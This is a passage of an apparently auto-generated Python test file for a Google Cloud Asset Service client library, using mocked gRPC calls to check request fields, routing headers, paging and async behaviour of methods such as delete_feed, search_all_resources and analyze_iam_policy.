credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.DeleteFeedRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_delete_feed_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_feed(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_delete_feed_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_feed(
asset_service.DeleteFeedRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_delete_feed_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = None
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_feed(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_delete_feed_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_feed(
asset_service.DeleteFeedRequest(),
name='name_value',
)
def test_search_all_resources(transport: str = 'grpc', request_type=asset_service.SearchAllResourcesRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.SearchAllResourcesResponse(
next_page_token='next_page_token_value',
)
response = client.search_all_resources(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.SearchAllResourcesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.SearchAllResourcesPager)
assert response.next_page_token == 'next_page_token_value'
def test_search_all_resources_from_dict():
test_search_all_resources(request_type=dict)
def test_search_all_resources_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
client.search_all_resources()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.SearchAllResourcesRequest()
@pytest.mark.asyncio
async def test_search_all_resources_async(transport: str = 'grpc_asyncio', request_type=asset_service.SearchAllResourcesRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(asset_service.SearchAllResourcesResponse(
next_page_token='next_page_token_value',
))
response = await client.search_all_resources(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.SearchAllResourcesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.SearchAllResourcesAsyncPager)
assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_search_all_resources_async_from_dict():
await test_search_all_resources_async(request_type=dict)
def test_search_all_resources_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.SearchAllResourcesRequest()
request.scope = 'scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
call.return_value = asset_service.SearchAllResourcesResponse()
client.search_all_resources(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'scope=scope/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_search_all_resources_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.SearchAllResourcesRequest()
request.scope = 'scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.SearchAllResourcesResponse())
await client.search_all_resources(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'scope=scope/value',
) in kw['metadata']
def test_search_all_resources_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.SearchAllResourcesResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.search_all_resources(
scope='scope_value',
query='query_value',
asset_types=['asset_types_value'],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].scope == 'scope_value'
assert args[0].query == 'query_value'
assert args[0].asset_types == ['asset_types_value']
def test_search_all_resources_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.search_all_resources(
asset_service.SearchAllResourcesRequest(),
scope='scope_value',
query='query_value',
asset_types=['asset_types_value'],
)
@pytest.mark.asyncio
async def test_search_all_resources_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.SearchAllResourcesResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.SearchAllResourcesResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.search_all_resources(
scope='scope_value',
query='query_value',
asset_types=['asset_types_value'],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].scope == 'scope_value'
assert args[0].query == 'query_value'
assert args[0].asset_types == ['asset_types_value']
@pytest.mark.asyncio
async def test_search_all_resources_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.search_all_resources(
asset_service.SearchAllResourcesRequest(),
scope='scope_value',
query='query_value',
asset_types=['asset_types_value'],
)
def test_search_all_resources_pager():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllResourcesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('scope', ''),
)),
)
pager = client.search_all_resources(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, assets.ResourceSearchResult)
for i in results)
def test_search_all_resources_pages():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllResourcesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
),
RuntimeError,
)
pages = list(client.search_all_resources(request={}).pages)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_search_all_resources_async_pager():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllResourcesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
),
RuntimeError,
)
async_pager = await client.search_all_resources(request={},)
assert async_pager.next_page_token == 'abc'
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, assets.ResourceSearchResult)
for i in responses)
@pytest.mark.asyncio
async def test_search_all_resources_async_pages():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_resources),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllResourcesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllResourcesResponse(
results=[
assets.ResourceSearchResult(),
assets.ResourceSearchResult(),
],
),
RuntimeError,
)
pages = []
async for page_ in (await client.search_all_resources(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
def test_search_all_iam_policies(transport: str = 'grpc', request_type=asset_service.SearchAllIamPoliciesRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.SearchAllIamPoliciesResponse(
next_page_token='next_page_token_value',
)
response = client.search_all_iam_policies(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.SearchAllIamPoliciesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.SearchAllIamPoliciesPager)
assert response.next_page_token == 'next_page_token_value'
def test_search_all_iam_policies_from_dict():
test_search_all_iam_policies(request_type=dict)
def test_search_all_iam_policies_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
client.search_all_iam_policies()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.SearchAllIamPoliciesRequest()
@pytest.mark.asyncio
async def test_search_all_iam_policies_async(transport: str = 'grpc_asyncio', request_type=asset_service.SearchAllIamPoliciesRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(asset_service.SearchAllIamPoliciesResponse(
next_page_token='next_page_token_value',
))
response = await client.search_all_iam_policies(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.SearchAllIamPoliciesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.SearchAllIamPoliciesAsyncPager)
assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_search_all_iam_policies_async_from_dict():
await test_search_all_iam_policies_async(request_type=dict)
def test_search_all_iam_policies_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.SearchAllIamPoliciesRequest()
request.scope = 'scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
call.return_value = asset_service.SearchAllIamPoliciesResponse()
client.search_all_iam_policies(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'scope=scope/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_search_all_iam_policies_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.SearchAllIamPoliciesRequest()
request.scope = 'scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.SearchAllIamPoliciesResponse())
await client.search_all_iam_policies(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'scope=scope/value',
) in kw['metadata']
def test_search_all_iam_policies_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.SearchAllIamPoliciesResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.search_all_iam_policies(
scope='scope_value',
query='query_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].scope == 'scope_value'
assert args[0].query == 'query_value'
def test_search_all_iam_policies_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.search_all_iam_policies(
asset_service.SearchAllIamPoliciesRequest(),
scope='scope_value',
query='query_value',
)
@pytest.mark.asyncio
async def test_search_all_iam_policies_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.SearchAllIamPoliciesResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.SearchAllIamPoliciesResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.search_all_iam_policies(
scope='scope_value',
query='query_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].scope == 'scope_value'
assert args[0].query == 'query_value'
@pytest.mark.asyncio
async def test_search_all_iam_policies_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.search_all_iam_policies(
asset_service.SearchAllIamPoliciesRequest(),
scope='scope_value',
query='query_value',
)
def test_search_all_iam_policies_pager():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllIamPoliciesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('scope', ''),
)),
)
pager = client.search_all_iam_policies(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, assets.IamPolicySearchResult)
for i in results)
def test_search_all_iam_policies_pages():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllIamPoliciesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
),
RuntimeError,
)
pages = list(client.search_all_iam_policies(request={}).pages)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_search_all_iam_policies_async_pager():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllIamPoliciesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
),
RuntimeError,
)
async_pager = await client.search_all_iam_policies(request={},)
assert async_pager.next_page_token == 'abc'
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, assets.IamPolicySearchResult)
for i in responses)
@pytest.mark.asyncio
async def test_search_all_iam_policies_async_pages():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.search_all_iam_policies),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
next_page_token='abc',
),
asset_service.SearchAllIamPoliciesResponse(
results=[],
next_page_token='def',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
],
next_page_token='ghi',
),
asset_service.SearchAllIamPoliciesResponse(
results=[
assets.IamPolicySearchResult(),
assets.IamPolicySearchResult(),
],
),
RuntimeError,
)
pages = []
async for page_ in (await client.search_all_iam_policies(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
def test_analyze_iam_policy(transport: str = 'grpc', request_type=asset_service.AnalyzeIamPolicyRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.AnalyzeIamPolicyResponse(
fully_explored=True,
)
response = client.analyze_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.AnalyzeIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.AnalyzeIamPolicyResponse)
assert response.fully_explored is True
def test_analyze_iam_policy_from_dict():
test_analyze_iam_policy(request_type=dict)
def test_analyze_iam_policy_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy),
'__call__') as call:
client.analyze_iam_policy()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.AnalyzeIamPolicyRequest()
@pytest.mark.asyncio
async def test_analyze_iam_policy_async(transport: str = 'grpc_asyncio', request_type=asset_service.AnalyzeIamPolicyRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(asset_service.AnalyzeIamPolicyResponse(
fully_explored=True,
))
response = await client.analyze_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.AnalyzeIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.AnalyzeIamPolicyResponse)
assert response.fully_explored is True
@pytest.mark.asyncio
async def test_analyze_iam_policy_async_from_dict():
await test_analyze_iam_policy_async(request_type=dict)
def test_analyze_iam_policy_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.AnalyzeIamPolicyRequest()
request.analysis_query.scope = 'analysis_query.scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy),
'__call__') as call:
call.return_value = asset_service.AnalyzeIamPolicyResponse()
client.analyze_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'analysis_query.scope=analysis_query.scope/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_analyze_iam_policy_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.AnalyzeIamPolicyRequest()
request.analysis_query.scope = 'analysis_query.scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.AnalyzeIamPolicyResponse())
await client.analyze_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'analysis_query.scope=analysis_query.scope/value',
) in kw['metadata']
def test_analyze_iam_policy_longrunning(transport: str = 'grpc', request_type=asset_service.AnalyzeIamPolicyLongrunningRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy_longrunning),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.analyze_iam_policy_longrunning(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.AnalyzeIamPolicyLongrunningRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_analyze_iam_policy_longrunning_from_dict():
test_analyze_iam_policy_longrunning(request_type=dict)
def test_analyze_iam_policy_longrunning_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy_longrunning),
'__call__') as call:
client.analyze_iam_policy_longrunning()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.AnalyzeIamPolicyLongrunningRequest()
@pytest.mark.asyncio
async def test_analyze_iam_policy_longrunning_async(transport: str = 'grpc_asyncio', request_type=asset_service.AnalyzeIamPolicyLongrunningRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy_longrunning),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.analyze_iam_policy_longrunning(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.AnalyzeIamPolicyLongrunningRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_analyze_iam_policy_longrunning_async_from_dict():
await test_analyze_iam_policy_longrunning_async(request_type=dict)
def test_analyze_iam_policy_longrunning_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.AnalyzeIamPolicyLongrunningRequest()
request.analysis_query.scope = 'analysis_query.scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy_longrunning),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.analyze_iam_policy_longrunning(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'analysis_query.scope=analysis_query.scope/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_analyze_iam_policy_longrunning_field_headers_async():
client = AssetServiceAsyncClient(
